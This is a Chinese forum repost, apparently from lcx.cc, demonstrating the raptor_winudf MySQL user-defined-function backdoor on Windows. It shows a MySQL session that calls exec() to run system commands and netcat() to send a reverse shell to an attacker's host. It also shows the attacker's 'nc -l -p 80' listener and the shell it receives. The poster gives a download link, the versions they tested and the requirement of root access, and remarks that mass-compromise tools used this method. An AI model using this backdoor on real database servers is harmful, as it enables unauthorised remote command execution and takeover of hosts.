技术非原创 我只是测试了额外的版本
=============================================
Usage example:
# mysql -h 192.168.0.203
# mysql -h 192.168.0.203
mysql> select * from mysql.func;
+--------+-----+------------+----------+
| name | ret | dl
| type |
+--------+-----+------------+----------+
| netcat | 2 | winudf.dll | function |
| exec | 2 | winudf.dll | function |
+--------+-----+------------+----------+
2 rows in set (0.00 sec)
mysql> select exec('echo foo > c:bar.txt');
mysql> select netcat('192.168.0.147');
[on the attacker's host]
# nc -l -p 80
[...]
Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
[...]
C:mysqldata>type c:bar.txt
============================================
作者测试了如下版本:
-- Tested on:
-- MySQL 4.0.18-win32 (running on Windows XP SP2)
-- MySQL 4.1.22-win32 (running on Windows XP SP2)
-- MySQL 5.0.27-win32 (running on Windows XP SP2)
我在 5.2.3 测试成功
raptor_winudf.tar:http://115.com/file/bhfolk3k
mysql root才可以加载组件
执行cmd只限制win
但是sqlmap 下发现了linux的 udf.os
估计也一样可以
-----------------------------
这个是很早的东西了 就是一个反弹shell的
以前3306 抓鸡工具就是用这个 然后用nc tagip
这个太粗糙了 dll文件编码竟然不是HEX的
就是反弹shell的 好执行shell命令
一堆抓鸡都是用这个sql文章来源于lcx.cc:Backdoors for Mysql raptor_winudf
此文是我前年研究struts框架相关安全特性做的总结,这里发上来,各位安全工作人员在查找Struts相关应用的漏洞有一定用处,但因为是去年的文档,因此可能有一些过时内容,大家在参考时需要注意。另外由于这篇文章主要是用来做总结,因此也没有多少例子,具体案例大家可…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论